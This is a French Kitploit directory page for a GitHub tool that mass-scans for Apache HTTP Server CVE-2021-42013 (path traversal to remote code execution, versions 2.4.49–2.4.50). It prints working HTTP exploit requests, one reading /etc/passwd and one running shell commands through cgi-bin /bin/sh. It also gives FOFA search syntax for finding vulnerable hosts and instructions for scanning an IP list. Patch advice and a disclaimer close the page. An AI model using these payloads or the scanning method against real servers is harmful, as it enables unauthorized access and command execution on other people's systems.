Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-42013-Apache-RCE-Poc-Exp — Outil de détection en masse d'exécution de code à distance Apache (CVE-2021-42013) : Apache HTTP Server est un serveur web open source de la fondation Apache (États-Unis). Ce serveur est rapide, fiable et peut être étendu via une API simple. Il a été découvert que le correctif pour CVE-2021-41773 dans Apache HTTP Server 2.4.50 était insuffisant. Un attaquant peut utiliser une attaque de traversée de chemin pour mapper une URL à des fichiers situés en dehors du répertoire configuré par des directives similaires à Alias. Si ces fichiers en dehors du répertoire ne sont pas protégés par la configuration par défaut "Exiger tout refus", ces requêtes peuvent réussir. Si des scripts CGI sont également activés pour ces chemins d'alias, cela peut permettre une exécution de code à distance. Ce problème affecte uniquement Apache 2.4.49 et Apache 2.4.50, et non les versions antérieures. | Kitploit
Outils/GitHubGitHub/asaotomo/cve-2021-42013-apache-rce-poc-exp
ReconnaissanceScanners de VulnérabilitésGénération de PayloadsExploitationExploitation d'Applications WebTests d'Intrusion
GitHubasaotomo/cve-2021-42013-apache-rce-poc-exp

CVE-2021-42013-Apache-RCE-Poc-Exp

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt
1025il y a 4 ansPas encore vérifié

À propos

Outil de détection en masse d'exécution de code à distance Apache (CVE-2021-42013) : Apache HTTP Server est un serveur web open source de la fondation Apache (États-Unis). Ce serveur est rapide, fiable et peut être étendu via une API simple. Il a été découvert que le correctif pour CVE-2021-41773 dans Apache HTTP Server 2.4.50 était insuffisant. Un attaquant peut utiliser une attaque de traversée de chemin pour mapper une URL à des fichiers situés en dehors du répertoire configuré par des directives similaires à Alias. Si ces fichiers en dehors du répertoire ne sont pas protégés par la configuration par défaut "Exiger tout refus", ces requêtes peuvent réussir. Si des scripts CGI sont également activés pour ces chemins d'alias, cela peut permettre une exécution de code à distance. Ce problème affecte uniquement Apache 2.4.49 et Apache 2.4.50, et non les versions antérieures.

Partager

Nom de la vulnérabilité

Apache Exécution de code à distance (CVE-2021-42013)

Description de la vulnérabilité

Apache HTTP Server est un serveur web open source de la Fondation Apache (États-Unis). Ce serveur est rapide, fiable et peut être étendu via une API simple. Il a été découvert que le correctif pour CVE-2021-41773 dans Apache HTTP Server 2.4.50 était insuffisant. Un attaquant peut utiliser une attaque par traversée de chemin pour mapper une URL vers des fichiers en dehors des répertoires configurés par des directives semblables à Alias. Si ces fichiers en dehors des répertoires ne sont pas protégés par la configuration par défaut « Require all denied », ces requêtes peuvent réussir. Si les scripts CGI sont également activés pour ces chemins d'alias, cela pourrait permettre une exécution de code à distance. Ce problème n'affecte qu'Apache 2.4.49 et Apache 2.4.50, pas les versions antérieures.

Versions concernées

Apache HTTP Server 2.4.49

Apache HTTP Server 2.4.50

Syntaxe FOFA

server="Apache/2.4.49" || server="Apache/2.4.50"

Utilisation

root@kitploit:~
1. Placez les adresses IP à analyser dans le fichier ip.txt
2. Exécutez python3 check.py
image

POC

root@kitploit:~
GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1
Host: vuglfocus.fofa.so:55493
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ZMSESSID=fcnisfo6rj1snid6e5r27kj1n0; zmSkin=classic
Connection: close
image

EXP

root@kitploit:~
GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1
Host: vuglfocus.fofa.so:55493
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ZMSESSID=fcnisfo6rj1snid6e5r27kj1n0; zmSkin=classic
Connection: close
Content-Length: 57

echo Content-Type: text/plain; echo;ls /

img

Recommandations de correctif

Ces vulnérabilités ont déjà été corrigées. Compte tenu de la gravité, il est recommandé aux utilisateurs affectés de mettre à niveau immédiatement vers Apache HTTP Server 2.4.51 (publié le 7 octobre) ou une version ultérieure.

Lien de téléchargement :

https://httpd.apache.org/download.cgi#apache24

Avertissements

Cet outil est fourni uniquement aux testeurs de sécurité pour une auto-évaluation de sécurité. L'auteur n'est pas responsable des conséquences d'une mauvaise utilisation par l'utilisateur. Les utilisateurs doivent impérativement respecter les lois locales. Ce programme ne doit pas être utilisé à des fins commerciales, uniquement pour l'apprentissage et l'échange.

147206848-6090876d-d029-4ffd-a6a8-ee4600071404
Télécharger l’outil